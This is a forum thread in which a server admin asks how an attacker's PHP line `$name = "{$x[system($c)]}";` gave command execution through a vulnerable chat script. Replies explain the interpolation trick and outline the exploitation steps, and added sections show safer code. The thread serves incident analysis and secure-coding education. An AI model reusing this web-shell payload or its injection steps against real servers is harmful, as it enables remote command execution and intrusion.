Hacked with system()

  • Oski

    Hacked with system()

    Hello,

    our server got hacked through a security hole in an open source php
    chat script.
    (nothing new so far, ok!)

    This chat script allowed the user to create a new php script on our
    server, with the following content: (the code between the two "..."
    from the hacker):

    <?
    $name = "{$x[system($c)]}";
    // some more lines omitted ...
    ?>

    save these lines as e.g. /sys.php and call it with your browser:

    http://localhost/sys.php?c=ls

    and you can execute any system command and see the results!

    But: How does it work? The content of a variable being executed and
    written to the browser?
    If it were just "system($c) " then I understood.
    I couldn't find anything about this on the web (didn't know how to
    specify the search to get useful results). Can anybody explain what
    happens?

    Thanks and best regards,
    Ingo

  • Tim Martin

    #2
    Re: Hacked with system()

    Oski wrote:
    > our server got hacked through a security hole in an open source php
    > chat script.
    > (nothing new so far, ok!)
    >
    > This chat script allowed the user to create a new php script on our
    > server, with the following content: (the code between the two "..."
    > from the hacker):
    >
    > <?
    > $name = "{$x[system($c)]}";
    > // some more lines omitted ...
    > ?>
    >
    > save these lines as e.g. /sys.php and call it with your browser:
    > http://localhost/sys.php?c=ls
    > and you can execute any system command and see the results!
    >
    > But: How does it work? The content of a variable being executed and
    > written to the browser?
    > If it were just "system($c) " then I understood.

    If you write
    $a = "{$x['key']}";

    then $a gets the value $x['key'] as expected.

    $a = $x[system($c)];

    then $a gets the element of the array $x corresponding to the return
    value of system($c) (and as a side-effect, system($c) has been called).

    It seems like combining these two features allows you to execute code
    within a double-quoted string, merely by referencing the string literal.

    I'm not sure if this is an intentional feature or not, hence whether
    it's a security hole or not. At the very least I think it deserves more
    emphasis in the manual page about quoted strings. Nothing I can see in
    the manual page mentions that arbitrary code could be executed.

    Tim


    • Tim Martin

      #3
      Re: Hacked with system()

      Tim Martin wrote:
      > Oski wrote:
      > > our server got hacked through a security hole in an open source php
      > > chat script.
      > > (nothing new so far, ok!)
      > >
      > > This chat script allowed the user to create a new php script on our
      > > server, with the following content: (the code between the two "..."
      > > from the hacker):
      > >
      > > <?
      > > $name = "{$x[system($c)]}";
      > > // some more lines omitted ...
      > > ?>
      > >
      > > save these lines as e.g. /sys.php and call it with your browser:
      > > http://localhost/sys.php?c=ls
      > > and you can execute any system command and see the results!
      > >
      > > But: How does it work? The content of a variable being executed and
      > > written to the browser?
      > > If it were just "system($c) " then I understood.
      >
      > If you write
      > $a = "{$x['key']}";
      >
      > then $a gets the value $x['key'] as expected.
      >
      > $a = $x[system($c)];
      >
      > then $a gets the element of the array $x corresponding to the return
      > value of system($c) (and as a side-effect, system($c) has been called).
      >
      > It seems like combining these two features allows you to execute code
      > within a double-quoted string, merely by referencing the string literal.
      >
      > I'm not sure if this is an intentional feature or not, hence whether
      > it's a security hole or not. At the very least I think it deserves more
      > emphasis in the manual page about quoted strings. Nothing I can see in
      > the manual page mentions that arbitrary code could be executed.

      Following up to myself, I should note that this is not as big an issue
      as it seems on the surface - it only matters if the malicious user
      writes the string literal itself. If they control a variable that is
      substituted into the string literal, it isn't a problem. e.g.

      $intermediate = "system($c) "; // Set by malicious user from a form input
      // or some other non-string-literal

      $a = "{$x[$intermediate]}"; // This code written by you, not under the
      // control of the malicious user

      is fine.

      Tim

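Tim's two cases above (an expression written into the literal versus a variable substituted into it), as an added example that is not code from the thread. A harmless `probe()` function stands in for `system()` so the difference is visible without running any command; the function and array names and the sample values are assumptions.

```php
<?php
// Added example, not code from the thread. A harmless stand-in for system():
// it records that it was called and returns a fixed array key.
$calls = [];

function probe(string $arg): string
{
    global $calls;
    $calls[] = $arg;
    return 'key';
}

// The array the string literal indexes into. The second entry exists only so
// that case 2 below resolves to a real key instead of an "undefined key" warning.
$x = [
    'key'       => 'value for key',
    'probe($c)' => 'plain lookup, nothing was called',
];
$c = 'ls';   // mirrors the ?c= parameter from the thread; it is never executed here

// Case 1: the expression is part of the literal itself, as in the generated file.
// PHP's complex (curly) syntax evaluates the index expression while building the
// string, so probe() runs and its return value selects $x['key'].
function caseExpressionInLiteral(): array
{
    global $x, $c, $calls;
    $calls = [];
    $name = "{$x[probe($c)]}";
    return ['result' => $name, 'calls' => $calls];
}

// Case 2: the untrusted party controls only a variable that is substituted into
// the literal. The text "probe($c)" is data and is used verbatim as the array key.
function caseExpressionInVariable(): array
{
    global $x, $calls;
    $calls = [];
    $intermediate = 'probe($c)';      // imagine this arrived from a form field
    $name = "{$x[$intermediate]}";
    return ['result' => $name, 'calls' => $calls];
}

var_dump(caseExpressionInLiteral());
var_dump(caseExpressionInVariable());
```

Running it shows the asymmetry Tim describes: only the first case records a `probe()` invocation, because interpolation evaluates the index expression that is part of the source text, whereas the second case treats the same characters as a lookup key. The risk therefore lies wherever untrusted input ends up inside source code that PHP later parses, not in interpolating variables.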

      • Sandman

        #4
        Re: Hacked with system()

        In article <1157450070.312008.144490@m79g2000cwm.googlegroups.com>,
        "Oski" <oski@gmx.de> wrote:
        > Hello,
        >
        > our server got hacked through a security hole in an open source php
        > chat script.
        > (nothing new so far, ok!)
        >
        > This chat script allowed the user to create a new php script on our
        > server, with the following content: (the code between the two "..."
        > from the hacker):
        >
        > <?
        > $name = "{$x[system($c)]}";
        > // some more lines omitted ...
        > ?>
        >
        > save these lines as e.g. /sys.php and call it with your browser:
        > http://localhost/sys.php?c=ls
        > and you can execute any system command and see the results!
        >
        > But: How does it work? The content of a variable being executed and
        > written to the browser?
        > If it were just "system($c) " then I understood.

        Well, it's odd. system() returns the last line of output if
        successful. But in this case, $name is set to the value of $x where
        the key is the last line of the output. Is there any $x declaration in
        the script?

        For instance, this:

        <?php
        $x["var"] = "foobar";
        $c = "ls";
        $name = "{$x[system($c)]}";
        print "Value: $name";
        ?>

        Outputs, after a long list of directories in my root directory (where
        'var' is the last):

        Value: foobar

        So, "var" is the last directory in the ls listing. And the value of
        $x["var"] is "foobar", which is assigned to $name.

        Why? I have no idea. I'd have to see the entire script for that.


        --
        Sandman[.net]


        • Guest

          #5
          Re: Hacked with system()

          > our server got hacked through a security hole in an open source php
          > chat script.

          Which one?

          Regards,
          Talthen



          • Oski

            #6
            Re: Hacked with system()

            Sandman wrote:
            > Why? I have no idea. I'd have to see the entire script for that.

            There is no more script, no more than what was posted by me! The other
            lines (mentioned as omitted) are only other declarations of scalar
            variables. If you omit these, the effect is quite the same.

            Btw, I'll not disclose which script is vulnerable (at least not now).
            I consider contacting the authors first - if this thread turns out to
            be a real security hole ...

            Ingo.


            • Sandman

              #7
              Re: Hacked with system()

              In article <1157456510.333540.78430@m73g2000cwd.googlegroups.com>,
              "Oski" <oski@gmx.de> wrote:
              > Sandman wrote:
              > > Why? I have no idea. I'd have to see the entire script for that.
              >
              > There is no more script, no more than what was posted by me! The other
              > lines (mentioned as omitted) are only other declarations of scalar
              > variables. If you omit these, the effect is quite the same.
              >
              > Btw, I'll not disclose which script is vulnerable (at least not now).
              > I consider contacting the authors first - if this thread turns out to
              > be a real security hole ...

              Then I suppose the script, as seen, was a small part of a larger
              "hack" library, which the author cut'n'pasted from.

              I've been "hacked" this way also, so I've seen some of these scripts.

              --
              Sandman[.net]


              • Robin

                #8
                Re: Hacked with system()

                Oski wrote:
                > This chat script allowed the user to create a new php script on our
                > server, [snip]

                Surely this is the security hole rather than the script created.
                Allowing anyone to write php code that will run on your server is a
                Really Bad Idea (tm).

                Robin


                • Oski

                  #9
                  Re: Hacked with system()

                  Sandman wrote:
                  > Then I suppose the script, as seen, was a small part of a larger
                  > "hack" library, which the author cut'n'pasted from.
                  >
                  > I've been "hacked" this way also, so I've seen some of these scripts.

                  In this case, the chat script asks for your name and email when
                  registering.
                  Then, it creates a php-script (as described in my first post) and
                  creates lines within it:

                  $name = "<userinput>";
                  $email = "<userinput_2>";
                  // and so on ...

                  So you just have to know where this php script is created/saved and
                  register with a tampered name and then call this php script with the
                  desired URL + encoded command strings, like "?c=ls%20-l" etc.

                  Of course, the real (huuuge!) security hole is creating a php script
                  with unchecked userinput. (I don't dare to guess what might happen if
                  you have disabled magic_quotes).

                  But I could not explain the behaviour of PHP as well, especially as
                  there is nothing documented about this "feature" to execute code within
                  a variable assignment.

                  Ingo

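The "real security hole" Ingo names in this post is a code generator that pastes registration fields into a double-quoted PHP literal. As an added example (not the chat script's code, and not a fix its authors published), the generator pattern is shown beside two hardened forms: emitting single-quoted literals via `var_export()`, which PHP never interpolates, and the preferable option of not writing code at all but storing the profile as JSON. Function names, the two fields, the temp-file path and the validation regex are assumptions; the sample name is the literal from the thread, used only to show how each variant treats it.

```php
<?php
// Added example, not the chat script's code. Demonstrates why generating PHP
// source from user input is the vulnerability, and two ways to avoid it.

// The pattern Ingo describes: user input pasted into a double-quoted literal.
// Any "{$...}" sequence in the input becomes live code once the file is included.
function renderProfileUnsafe(string $name, string $email): string
{
    return "<?php\n\$name = \"$name\";\n\$email = \"$email\";\n";
}

// Hardened variant 1: still generates code, but var_export() emits a
// single-quoted, escaped literal, and single-quoted strings are never interpolated.
function renderProfileSafe(string $name, string $email): string
{
    return "<?php\n"
        . '$name = ' . var_export($name, true) . ";\n"
        . '$email = ' . var_export($email, true) . ";\n";
}

// Hardened variant 2 (preferred): keep data as data. A JSON file is read with
// json_decode(), never parsed by the PHP compiler, so its contents cannot run.
function storeProfile(string $path, string $name, string $email): void
{
    $json = json_encode(['name' => $name, 'email' => $email], JSON_THROW_ON_ERROR);
    file_put_contents($path, $json, LOCK_EX);
}

function loadProfile(string $path): array
{
    return json_decode(file_get_contents($path), true, 512, JSON_THROW_ON_ERROR);
}

// Input validation as a second, independent layer: an allow-list for the name
// (letters, digits, space, underscore, dot, hyphen) and filter_var() for the email.
function validateRegistration(string $name, string $email): bool
{
    return preg_match('/^[\p{L}\p{N} _.-]{1,40}$/u', $name) === 1
        && filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

// Constructed sample input modelled on the thread: a "name" carrying the
// interpolation trick, and an ordinary email address.
$name  = '{$x[system($c)]}';
$email = 'user@example.com';

echo "--- unsafe generator output ---\n", renderProfileUnsafe($name, $email);
echo "--- var_export generator output ---\n", renderProfileSafe($name, $email);

$path = sys_get_temp_dir() . '/profile-example.json';   // assumed location
storeProfile($path, $name, $email);
$profile = loadProfile($path);
echo "--- JSON round trip ---\n";
var_dump($profile['name'] === $name);

echo "--- validation of the sample name ---\n";
var_dump(validateRegistration($name, $email));
```

Comparing the two generator outputs makes the point: the unsafe variant reproduces the `$name = "{$x[system($c)]}";` line from the first post as executable source, while `var_export()` wraps the same bytes in single quotes where they are inert. The JSON variant removes the problem class entirely, and the allow-list rejects the sample name before storage, so either layer alone would have stopped this intrusion. Note also that relying on `magic_quotes`, as the post wonders about, only escapes quote characters and would not have prevented this, since the payload needs no quotes at all.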
